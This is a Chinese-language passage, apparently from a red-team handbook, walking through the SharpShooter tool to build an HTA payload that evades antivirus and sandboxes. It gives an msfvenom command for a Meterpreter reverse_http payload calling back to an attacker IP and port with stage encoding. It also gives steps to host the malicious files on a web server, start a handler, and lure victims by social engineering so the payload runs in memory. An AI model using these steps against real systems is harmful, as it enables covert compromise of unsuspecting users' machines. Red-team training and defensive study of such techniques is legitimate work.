Question

作为红队，较耗时的工作之一是创建静荷，规避下一代杀毒软件和沙箱。我们一直在寻找新的方法，创建初始入口。一个名为 SharpShooter 的工具采用了许多反沙箱技术，James Forshaw 编写的 DotNetToJScript 可用来执行 Windows 脚本格式的 shellcode（CACTUSTORCH 工具见 GitHub 相关网页）。

MDSec 网站介绍了 SharpShooter：“SharpShooter 支持分阶段和无阶段静荷执行。分阶段执行可以采用 HTTP(S)、DNS 或两者进行传输。当执行分阶段静荷时，它尝试检索 C Sharp 压缩的源代码文件，然后使用所选择的传递技术，进行 base64 编码。下载 C Sharp 项目源代码，在主机上使用.NET CodeDom 编译器进行编译。然后，使用反射方法从源代码执行所需的方法。”

下面我们看一个简单的例子。

• python SharpShooter.py --interactive。
• 1 - 适用于.NET v2。
• Y - 分阶段静荷。
• 1 - HTA 静荷。
• 您可以选择技术，成功绕过沙箱，执行恶意软件。提供以下防沙箱技术。
  • 域的密钥
  • 确保加入域名
  • 检查沙箱
  • 检查错误的 MAC
  • 检查调试
• 1 - 网络传递。
• Y - 内置 shellcode 模板。
• shellcode 作为字节数组。
  • 打开一个新终端，创建一个 csharp Meterpreter 静荷
  • msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=10.100.100.9 LPORT= 8080 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f csharp
  • 复制“{”和“}”之间的所有内容，采用字节数组形式提交
• 为 CSharp 网络传递提供 URI。
  • 输入攻击者的 IP/端口和文件
• 提供输出文件的名称。
  • 恶意软件
• Y—您想要在 HTML 内部添加内容吗？
• 使用自定义（1）或预定义（2）模板。
  • 要进行测试，可选择任何预定义模板
• 将新创建的恶意文件移动到您的网站目录。
  • mv output/* /var/www/html/
• 为静荷设置 Meterpreter 处理程序。

配置和开发恶意软件后，将其移至 Web 目录（malware.hta、malware.html、malware. payload），启动 Apache 2 服务，然后启动 Meterpreter 处理程序。现在采用社会工程学方法，引诱被攻击者访问恶意网站！上面给出的示例是 SharpShooter 的 SharePoint 在线模板。当被攻击者使用 IE/Edge 访问您的恶意页面时，HTA 会自动下载并提示运行。弹出窗口后，如果选择运行，将运行静荷，下载第二静荷（如果规避沙箱监控），并在内存中执行 Meterpreter 静荷，如图 7.2 所示。

图 7.2